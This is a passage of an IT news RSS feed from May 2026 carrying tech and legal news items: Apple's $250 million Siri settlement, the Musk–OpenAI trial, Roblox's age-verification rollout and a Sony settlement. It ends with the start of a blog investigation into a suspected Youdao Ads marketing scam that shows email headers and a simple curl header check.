<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/apple-to-pay-250m-in-settlement-over-ai-delays/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/apple-to-pay-250m-in-settlement-over-ai-delays/">Apple To Pay $250m In Settlement Over AI Delays</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple to Pay $250 Million Over Siri Delay Lawsuit, Users Could Get Up to $95 Per Device]]></title>
<description><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit tied to delays in its “more personalized Siri” features, which the company first introduced at WWDC 2024 and later promoted heavily during the iPhone 16 launch, but failed to deliver on time, leading to claims that Apple create...]]></description>
<link>https://tsecurity.de/de/3491322/ios-mac-os/apple-to-pay-250-million-over-siri-delay-lawsuit-users-could-get-up-to-95-per-device/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491322/ios-mac-os/apple-to-pay-250-million-over-siri-delay-lawsuit-users-could-get-up-to-95-per-device/</guid>
<pubDate>Wed, 06 May 2026 06:00:26 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit tied to delays in its “more personalized Siri” features, which the company first introduced at WWDC 2024 and later promoted heavily during the iPhone 16 launch, but failed to deliver on time, leading to claims that Apple created a “clear and reasonable consumer expectation” around features that were not ready.



The lawsuit focused on how Apple marketed its Apple Intelligence-powered Siri, with plaintiffs arguing that the company promoted capabilities that “did not exist at the time” and would not arrive for years, while Apple denied any wrongdoing and chose to settle to avoid prolonged legal costs and keep focus on product development.



How much money users will receive



Apple will pay around $25 per eligible device, but that number can increase depending on how many users file claims. If fewer people apply, the payout can rise to as much as $95 per device, though the final amount will drop if claim volume is high because legal fees and administrative costs also come out of the total settlement pool.



The settlement covers devices purchased in the United States between June 10, 2024 and March 29, 2025, including:




iPhone 15 Pro and iPhone 15 Pro Max



iPhone 16, 16e, and 16 Plus



iPhone 16 Pro and 16 Pro Max




Apple’s response to the lawsuit



Apple said it settled the case without admitting fault and emphasized its ongoing work on Apple Intelligence features.




“Since the launch of Apple Intelligence, we have introduced dozens of features across many languages that are integrated across Apple’s platforms, relevant to what users do every day, and built with privacy protections at every step. These include Visual Intelligence, Live Translation, Writing Tools, Genmoji, Clean Up and many more. Apple has reached a settlement to resolve claims related to the availability of two additional features. We resolved this matter to stay focused on doing what we do best, delivering the most innovative products and services to our users.” - Apple spokesperson




Apple continues to highlight “dozens of features” already shipped, even as the case centered on two missing Siri capabilities that were heavily advertised.



What you need to file a claim



If you bought one of the listed devices during the eligible period, you will need proof of purchase such as your device serial number, Apple Account details, or phone number, and Apple will send official claim notices within 45 days after the court’s preliminary approval.



This settlement puts a price on delayed AI promises, and it signals how closely regulators and consumers are watching how companies promote features tied to artificial intelligence.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Agrees To Pay iPhone Owners $250 Million For Not Delivering AI Siri]]></title>
<description><![CDATA[Apple has agreed to a proposed $250 million settlement over claims that it misled iPhone buyers about the availability of Apple Intelligence and its upgraded Siri features. The settlement would cover U.S. buyers of the iPhone 16 lineup and iPhone 15 Pro models between June 10, 2024, and March 29,...]]></description>
<link>https://tsecurity.de/de/3491031/it-security-nachrichten/apple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491031/it-security-nachrichten/apple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri/</guid>
<pubDate>Wed, 06 May 2026 01:25:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has agreed to a proposed $250 million settlement over claims that it misled iPhone buyers about the availability of Apple Intelligence and its upgraded Siri features. The settlement would cover U.S. buyers of the iPhone 16 lineup and iPhone 15 Pro models between June 10, 2024, and March 29, 2025. The Verge reports: The settlement will resolve a 2025 lawsuit, alleging Apple's advertisements created a "clear and reasonable consumer expectation" that Apple Intelligence features would be available with the launch of the iPhone 16. The lawsuit claimed Apple's products "offered a significantly limited or entirely absent version of Apple Intelligence, misleading consumers about its actual utility and performance."
 
Apple brought certain AI-powered features to the iPhone 16 weeks after its release, and delayed the launch of its more personalized Siri, which is now expected to arrive later this year. Last April, the National Advertising Division recommended that Apple "discontinue or modify" its "available now" claim for Apple Intelligence. Apple also pulled an iPhone 16 ad showing actor Bella Ramsey using the AI-upgraded Siri.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Apple+Agrees+To+Pay+iPhone+Owners+%24250+Million+For+Not+Delivering+AI+Siri%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F05%2F2244236%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F05%2F2244236%2Fapple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/05/05/2244236/apple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple agrees to pay $250m after falsely claiming AI-powered Siri was ‘available now’]]></title>
<description><![CDATA[Settlement, which includes no admission of wrongdoing, covers roughly 36m eligible devices in class-action lawsuitApple on Tuesday agreed to pay $250m to settle a class-action lawsuit accusing it of misleading millions of iPhone buyers by falsely touting artificial intelligence capabilities for i...]]></description>
<link>https://tsecurity.de/de/3491029/ai-nachrichten/apple-agrees-to-pay-250m-after-falsely-claiming-ai-powered-siri-was-available-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491029/ai-nachrichten/apple-agrees-to-pay-250m-after-falsely-claiming-ai-powered-siri-was-available-now/</guid>
<pubDate>Wed, 06 May 2026 01:20:01 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Settlement, which includes no admission of wrongdoing, covers roughly 36m eligible devices in class-action lawsuit</p><p><a href="https://www.theguardian.com/technology/apple">Apple</a> on Tuesday agreed to pay $250m to settle a class-action lawsuit accusing it of misleading millions of <a href="https://www.theguardian.com/technology/iphone">iPhone</a> buyers by falsely touting artificial intelligence capabilities for its Siri voice assistant in late 2024.</p><p>Plaintiffs accused the California tech giant of having “promoted AI capabilities that did not exist at the time, do not exist now, and will not exist for two or more years” in order to boost iPhone sales, according to the suit. Apple’s more “personalized” version of Siri still has not been fully released despite its announcement nearly two years ago.</p> <a href="https://www.theguardian.com/technology/2026/may/05/apple-siri-ai-settlement">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple will pay $250 million for failing to deliver its AI-powered Siri on time]]></title>
<description><![CDATA[The proposed settlement is the result of a class action lawsuit filed in California.]]></description>
<link>https://tsecurity.de/de/3490951/it-nachrichten/apple-will-pay-250-million-for-failing-to-deliver-its-ai-powered-siri-on-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490951/it-nachrichten/apple-will-pay-250-million-for-failing-to-deliver-its-ai-powered-siri-on-time/</guid>
<pubDate>Wed, 06 May 2026 00:03:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The proposed settlement is the result of a class action lawsuit filed in California.]]></content:encoded>
</item>
<item>
<title><![CDATA[Lawsuit over delayed Siri features reaches massive $250M settlement]]></title>
<description><![CDATA[While Apple's promised Siri overhaul is still nowhere to be found, shareholders who sued over the delay can now rest easy, thanks to a huge settlement.Apple has settled a class-action lawsuit over its delayed Siri features.At WWDC 2024, as part of its Apple Intelligence announcements, Apple previ...]]></description>
<link>https://tsecurity.de/de/3490947/ios-mac-os/lawsuit-over-delayed-siri-features-reaches-massive-250m-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490947/ios-mac-os/lawsuit-over-delayed-siri-features-reaches-massive-250m-settlement/</guid>
<pubDate>Tue, 05 May 2026 23:55:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While Apple's promised <a href="https://appleinsider.com/inside/siri" title="Siri" data-kpt="1">Siri</a> overhaul is still nowhere to be found, shareholders who sued over the delay can now rest easy, thanks to a huge settlement.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67552-142286-66856-140246-Apple-Intelligence-lawsuit-gavel-xl.jpg" alt="Wooden judge's gavel resting on a block, with an Apple logo surrounded by a decorative atomic-style pattern engraved on the gavel head against a neutral gray background"><br><span>Apple has settled a class-action lawsuit over its delayed Siri features.</span></div><br>At <a href="https://appleinsider.com/inside/wwdc" title="WWDC" data-kpt="1">WWDC</a> 2024, as part of its <a href="https://appleinsider.com/inside/apple-intelligence" title="Apple Intelligence" data-kpt="1">Apple Intelligence</a> announcements, Apple previewed major enhancements for Siri. The virtual assistant was supposed to receive an AI-powered cognitive boost, allowing for advanced in-app actions, contextual awareness, and more.<br><br>The company went so far as to feature Siri's new capabilities in its marketing materials, including video advertisements. Things went south in a matter of months, however.<br><br><br> <a href="https://appleinsider.com/articles/26/05/05/lawsuit-over-delayed-siri-features-reaches-massive-250m-settlement?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244247?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple agrees to pay iPhone owners $250 million for not delivering AI Siri]]></title>
<description><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit that accused it of misleading customers about the availability of its Apple Intelligence features. The proposed settlement would apply to people in the US who purchased all models of the iPhone 16 and the iPhone 15 Pro between ...]]></description>
<link>https://tsecurity.de/de/3490905/it-nachrichten/apple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490905/it-nachrichten/apple-agrees-to-pay-iphone-owners-250-million-for-not-delivering-ai-siri/</guid>
<pubDate>Tue, 05 May 2026 23:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit that accused it of misleading customers about the availability of its Apple Intelligence features. The proposed settlement would apply to people in the US who purchased all models of the iPhone 16 and the iPhone 15 Pro between June 10th, 2024 and […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple reaches $250mn settlement over delayed ‘AI Siri’]]></title>
<description><![CDATA[iPhone buyers sued the tech giant for touting features in 2024 that have yet to launch]]></description>
<link>https://tsecurity.de/de/3490870/ai-nachrichten/apple-reaches-250mn-settlement-over-delayed-ai-siri/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490870/ai-nachrichten/apple-reaches-250mn-settlement-over-delayed-ai-siri/</guid>
<pubDate>Tue, 05 May 2026 23:05:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[iPhone buyers sued the tech giant for touting features in 2024 that have yet to launch]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Reaches $250 Million Settlement Over Claims It Misled People on A.I.]]></title>
<description><![CDATA[Some iPhone owners will be eligible to receive $25 to $95 over claims that the tech giant oversold its artificial intelligence system, Apple Intelligence.]]></description>
<link>https://tsecurity.de/de/3490866/it-nachrichten/apple-reaches-250-million-settlement-over-claims-it-misled-people-on-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490866/it-nachrichten/apple-reaches-250-million-settlement-over-claims-it-misled-people-on-ai/</guid>
<pubDate>Tue, 05 May 2026 23:03:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Some iPhone owners will be eligible to receive $25 to $95 over claims that the tech giant oversold its artificial intelligence system, Apple Intelligence.]]></content:encoded>
</item>
<item>
<title><![CDATA[Western Union Launches USDPT Stablecoin on Solana Blockchain, Coin Issued by Anchorage Digital]]></title>
<description><![CDATA[Western Union has launched the USDPT stablecoin on Solana as part of its expansion into blockchain-based settlement and remittance infrastructure. The stablecoin is initially rolling out in Bolivia and the Philippines, with broader expansion planned for 2026.]]></description>
<link>https://tsecurity.de/de/3489725/it-nachrichten/western-union-launches-usdpt-stablecoin-on-solana-blockchain-coin-issued-by-anchorage-digital/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3489725/it-nachrichten/western-union-launches-usdpt-stablecoin-on-solana-blockchain-coin-issued-by-anchorage-digital/</guid>
<pubDate>Tue, 05 May 2026 15:17:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Western Union has launched the USDPT stablecoin on Solana as part of its expansion into blockchain-based settlement and remittance infrastructure. The stablecoin is initially rolling out in Bolivia and the Philippines, with broader expansion planned for 2026.]]></content:encoded>
</item>
<item>
<title><![CDATA[SEC Fines Musk $1.5m Over Twitter Stake Disclosure]]></title>
<description><![CDATA[Entrepreneur Elon Musk to pay $1.5m in settlement with US regulator over failure to disclose large stake in Twitter ahead of buyout This article has been indexed from Silicon UK Read the original article: SEC Fines Musk $1.5m Over Twitter…
Read more →
The post SEC Fines Musk $1.5m Over Twitter St...]]></description>
<link>https://tsecurity.de/de/3488939/it-security-nachrichten/sec-fines-musk-15m-over-twitter-stake-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488939/it-security-nachrichten/sec-fines-musk-15m-over-twitter-stake-disclosure/</guid>
<pubDate>Tue, 05 May 2026 11:22:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Entrepreneur Elon Musk to pay $1.5m in settlement with US regulator over failure to disclose large stake in Twitter ahead of buyout This article has been indexed from Silicon UK Read the original article: SEC Fines Musk $1.5m Over Twitter…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/sec-fines-musk-1-5m-over-twitter-stake-disclosure/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/sec-fines-musk-1-5m-over-twitter-stake-disclosure/">SEC Fines Musk $1.5m Over Twitter Stake Disclosure</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI President Discloses His Stake In the Company Is Worth $30 Billion]]></title>
<description><![CDATA[OpenAI president Greg Brockman's testimony dominated the fifth day of the trial for Elon Musk's lawsuit against the AI company. Brockman took the witness stand on Monday, disclosing that his stake in OpenAI is worth nearly $30 billion, despite not personally investing money in OpenAI. The judge a...]]></description>
<link>https://tsecurity.de/de/3488212/it-security-nachrichten/openai-president-discloses-his-stake-in-the-company-is-worth-30-billion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488212/it-security-nachrichten/openai-president-discloses-his-stake-in-the-company-is-worth-30-billion/</guid>
<pubDate>Tue, 05 May 2026 05:36:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI president Greg Brockman's testimony dominated the fifth day of the trial for Elon Musk's lawsuit against the AI company. Brockman took the witness stand on Monday, disclosing that his stake in OpenAI is worth nearly $30 billion, despite not personally investing money in OpenAI. The judge also declined to admit a pretrial text in which Musk allegedly warned Brockman that he and Altman would become "the most hated men in America." From a report: Brockman's disclosure would put him on the Forbes list of the world's richest people, with wealth comparable to Melinda French Gates. [...] Late Sunday, OpenAI lawyers tried to admit as evidence a text message Musk sent to Brockman two days before the trial began. According to a court filing -- which did not include the actual text exchange -- Musk sent a message to Brockman to gauge interest in settlement.
 
When Brockman replied that both sides should drop their respective claims, Musk shot back, according to the filing, "By the end of this week, you and Sam will be the most hated men in America. If you insist, so it will be." Judge Yvonne Gonzalez Rogers, who is overseeing the trial, did not admit the text exchange as evidence. Brockman acknowledged that he had promised to personally donate $100,000 to OpenAI's charity but never did. In explaining the delay, Brockman put the onus on Altman: "I asked Sam when I should donate this, and he said he would let me know," reports Business Insider.
 
The first witness to testify on Monday was Stuart Russell, an artificial intelligence expert who teaches computer science at the University of California, Berkeley. "The most memorable part of Russell's testimony was when he talked about how much Musk's legal team paid him," notes Business Insider. "He received an eye-popping $5,000 per hour for 40 hours of preparatory work. Expert witnesses in high-profile cases typically make between $500 to $1,000 per hour."
 
Recap:

Musk Concludes Testimony At OpenAI Trial (Day Four)
Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) 
Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) 
Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One)<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OpenAI+President+Discloses+His+Stake+In+the+Company+Is+Worth+%2430+Billion%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F04%2F2247258%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F04%2F2247258%2Fopenai-president-discloses-his-stake-in-the-company-is-worth-30-billion%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/05/04/2247258/openai-president-discloses-his-stake-in-the-company-is-worth-30-billion?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk will settle the feds’ Twitter lawsuit with pocket change]]></title>
<description><![CDATA[Last year, the SEC sued Elon Musk over the way his acquisition of Twitter (now X, and a part of SpaceX) started, and today it announced a settlement that looks like a massive bargain, while Musk's own lawsuit against Sam Altman continues to play out. A week before the Trump administration took ov...]]></description>
<link>https://tsecurity.de/de/3487534/it-nachrichten/elon-musk-will-settle-the-feds-twitter-lawsuit-with-pocket-change/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487534/it-nachrichten/elon-musk-will-settle-the-feds-twitter-lawsuit-with-pocket-change/</guid>
<pubDate>Tue, 05 May 2026 00:15:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last year, the SEC sued Elon Musk over the way his acquisition of Twitter (now X, and a part of SpaceX) started, and today it announced a settlement that looks like a massive bargain, while Musk's own lawsuit against Sam Altman continues to play out. A week before the Trump administration took over, the department […]]]></content:encoded>
</item>
<item>
<title><![CDATA[What to Know About Sony’s $7.85 Million PlayStation Settlement]]></title>
<description><![CDATA[Are you eligible for a payout? Probably, but it might take a while and will likely be pretty small.]]></description>
<link>https://tsecurity.de/de/3487465/it-nachrichten/what-to-know-about-sonys-785-million-playstation-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487465/it-nachrichten/what-to-know-about-sonys-785-million-playstation-settlement/</guid>
<pubDate>Mon, 04 May 2026 23:32:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Are you eligible for a payout? Probably, but it might take a while and will likely be pretty small.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sony to Pay $7.85M in PlayStation Store Settlement. What to Know]]></title>
<description><![CDATA[Payments are automatic in most cases, but those with deactivated PlayStation Network accounts will have to put in more work to receive their share.]]></description>
<link>https://tsecurity.de/de/3487387/it-nachrichten/sony-to-pay-785m-in-playstation-store-settlement-what-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487387/it-nachrichten/sony-to-pay-785m-in-playstation-store-settlement-what-to-know/</guid>
<pubDate>Mon, 04 May 2026 22:31:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Payments are automatic in most cases, but those with deactivated PlayStation Network accounts will have to put in more work to receive their share.]]></content:encoded>
</item>
<item>
<title><![CDATA[Musk threatened to make OpenAI’s Altman and Brockman ‘the most hated men in America’]]></title>
<description><![CDATA[Text exchange revealed in court filings came after world’s richest man tried to start last-minute settlement talks]]></description>
<link>https://tsecurity.de/de/3487097/ai-nachrichten/musk-threatened-to-make-openais-altman-and-brockman-the-most-hated-men-in-america/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487097/ai-nachrichten/musk-threatened-to-make-openais-altman-and-brockman-the-most-hated-men-in-america/</guid>
<pubDate>Mon, 04 May 2026 20:02:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Text exchange revealed in court filings came after world’s richest man tried to start last-minute settlement talks]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk sent ominous texts to Greg Brockman, Sam Altman after asking for a settlement, OpenAI claims]]></title>
<description><![CDATA[Musk texted OpenAI's president and co-founder saying that he and CEO Sam Altman "will be the most hated men in America."]]></description>
<link>https://tsecurity.de/de/3486865/it-nachrichten/elon-musk-sent-ominous-texts-to-greg-brockman-sam-altman-after-asking-for-a-settlement-openai-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3486865/it-nachrichten/elon-musk-sent-ominous-texts-to-greg-brockman-sam-altman-after-asking-for-a-settlement-openai-claims/</guid>
<pubDate>Mon, 04 May 2026 18:46:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Musk texted OpenAI's president and co-founder saying that he and CEO Sam Altman "will be the most hated men in America."]]></content:encoded>
</item>
<item>
<title><![CDATA[Musk’s “World War III” threat in Twitter lawsuit haunts him at OpenAI trial]]></title>
<description><![CDATA[OpenAI accuses Musk of trying to "coerce" a settlement days before trial started.]]></description>
<link>https://tsecurity.de/de/3486649/ai-nachrichten/musks-world-war-iii-threat-in-twitter-lawsuit-haunts-him-at-openai-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3486649/ai-nachrichten/musks-world-war-iii-threat-in-twitter-lawsuit-haunts-him-at-openai-trial/</guid>
<pubDate>Mon, 04 May 2026 17:18:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI accuses Musk of trying to "coerce" a settlement days before trial started.]]></content:encoded>
</item>
<item>
<title><![CDATA[Roblox Blames Age-Verification Rollout for Lowered Growth. Stock Tumbles 22%]]></title>
<description><![CDATA[Age verification became mandatory for chat access on Roblox in January — and Friday morning Quartz reported it's apparently impacted the company's financials:


Roblox cut its full-year 2026 bookings forecast by roughly $900 million at the midpoint on Thursday, blaming stronger-than-expected head...]]></description>
<link>https://tsecurity.de/de/3484948/it-security-nachrichten/roblox-blames-age-verification-rollout-for-lowered-growth-stock-tumbles-22/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3484948/it-security-nachrichten/roblox-blames-age-verification-rollout-for-lowered-growth-stock-tumbles-22/</guid>
<pubDate>Mon, 04 May 2026 06:51:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Age verification became mandatory for chat access on Roblox in January — and Friday morning Quartz reported it's apparently impacted the company's financials:


Roblox cut its full-year 2026 bookings forecast by roughly $900 million at the midpoint on Thursday, blaming stronger-than-expected headwinds from its mandatory age-verification rollout on an audience that skews heavily toward children and teenagers. Full-year 2026 bookings are now projected at $7.33 billion to $7.60 billion, a range that sits roughly $900 million below the prior guidance of $8.28 billion to $8.55 billion; analysts had expected $8.38 billion, according to Yahoo Finance. Roblox stock fell almost 22% in premarket trading.... 

Daily active users rose 35% year over year to 132 million, while hours engaged climbed 43% to 31 billion hours... Daily Active Users and hours engaged fell below forecasts of 143.8 million and 33.68 billion, respectively, according to Yahoo Finance... Users who have not completed age checks have faced restricted communication features, and the process has weighed on the platform's ability to bring in new users. Russia's blocking of the platform, which took effect in December 2025, added further drag on user growth, according to Yahoo Finance. As of the end of the first quarter, 51% of global daily active users had completed age verification, with 65% of U.S. users having done so, Roblox said.... 

The safety push has come with legal costs. Roblox accrued $57 million in the first quarter for settlements and settlement proposals with certain states over youth-related consumer protection and digital safety matters, with payments structured over multiple years, the company said.
 

Roblox acknowledged in a letter to shareholders that "our aggressive push to enhance safety lowers our expectations for topline growth in 2026." But they argued that it also "makes our platform fundamentally better and amplifies the long-term growth potential of Roblox through more effective content targeting, tailored communication experiences, and improved community sentiment."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Roblox+Blames+Age-Verification+Rollout+for+Lowered+Growth.+Stock+Tumbles+22%25%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F04%2F0217228%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F04%2F0217228%2Froblox-blames-age-verification-rollout-for-lowered-growth-stock-tumbles-22%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/05/04/0217228/roblox-blames-age-verification-rollout-for-lowered-growth-stock-tumbles-22?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PART 2: I Published a Scam Expose.]]></title>
<description><![CDATA[PART 2: I Published a Scam Expose. NetEase Sent a Takedown Request. Then They Rewrote Their Entire Operation.A forensic timeline of SSL certs, WHOIS manipulation, DNS chains, paid trust scores, and the email that proves a billion-dollar company changed their behavior because of one article.This i...]]></description>
<link>https://tsecurity.de/de/3481898/hacking/part-2-i-published-a-scam-expose/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3481898/hacking/part-2-i-published-a-scam-expose/</guid>
<pubDate>Sat, 02 May 2026 09:52:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>PART 2: I Published a Scam Expose. NetEase Sent a Takedown Request. Then They Rewrote Their Entire Operation.</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AJ6IFK80R8ntqMOEfXs1Mg.png"></figure><h3>A forensic timeline of SSL certs, WHOIS manipulation, DNS chains, paid trust scores, and the email that proves a billion-dollar company changed their behavior because of one article.</h3><blockquote><strong><em>This is Part 2 of an ongoing investigation.</em></strong><em> Part 1: </em><a href="https://medium.com/@freerave/exposed-the-youdao-ads-influencer-marketing-scam-e389a0fb3f3c">EXPOSED: The “Youdao Ads” Influencer Marketing Scam</a></blockquote><p>Before we begin — a note on methodology.</p><p>When I published Part 1, I labeled this operation a scam based on the evidence available at the time. After 18 days of forensic follow-up, the picture is more nuanced. This article is not a retraction. It is an upgrade — more data, better conclusions, harder questions.</p><p>Everything here is reproducible. Every command is included. Every timestamp is documented. The security community can verify independently.</p><h3>The 18-Day Forensic Timeline</h3><pre>Apr  5, 2026  → SSL certificate issued: infunease.youdaoads.com<br>Apr 11, 2026  → Mass cold outreach (anjiaqi06@corp.netease.com)<br>               → curl -I infunease.youdaoads.com = 403 Forbidden<br>               → Scam Detector score: 28.8/100<br>               → Article published on dev.to<br>               → Google AI indexes and begins citing article<br>Apr 14, 2026  → WHOIS record updated (3 days post-publication)<br>Apr 28, 2026  → Takedown email received (youdaoads@rd.netease.com)<br>               → Public comment on dev.to article (@YoudaoAds)<br>               → curl -I infunease.youdaoads.com = 200 OK (same day)<br>               → Scam Detector drops further: 15/100<br>               → Formal documentation request sent - no response<br>Apr 29, 2026  → ScamAdviser score: 100/100 "Very Likely Safe"<br>               → New outreach email (tangxi03@corp.netease.com)<br>               → Professional NetEase 網易 branding<br>               → Every red flag from Part 1 - addressed</pre><p>Let’s go through each entry.</p><h3>Entry 1: The Original Email — Red Flags Documented</h3><p>On April 11, this arrived:</p><pre>From: anjiaqi06@corp.netease.com<br>Subject: Don't scroll past 【Youdao Ads】– a paid collab <br>         that's actually your vibe 😉<br><br>💰 Budget's ready – just name your rate<br>⏳ Spots are filling up – other creators are already <br>   looking at them<br>[Youdao Ads] [Discord] [WhatsApp group invite]</pre><p>Authentication results:</p><pre>dkim=pass   header.i=@corp.netease.com<br>spf=pass    smtp.mailfrom=anjiaqi06@corp.netease.com<br>dmarc=pass  (p=NONE sp=NONE dis=NONE)<br>Received: from corp-front01-corp.i.nease.net [1.95.22.228]<br>X-Originating-IP: [115.236.116.73]<br>X-Mailer: Coremail Webmail Server XT6.0.5</pre><p><strong>Every authentication check passed.</strong> The email genuinely came from NetEase corporate servers.</p><p>This is the first lesson of this investigation: <strong>email authentication tells you origin, not intent.</strong></p><p>The site linked in the email:</p><pre>$ curl -I https://infunease.youdaoads.com<br>HTTP/1.1 403 Forbidden<br>x-deny-reason: host_not_allowed<br>server: envoy</pre><p>A platform sending mass creator outreach while its own site returns 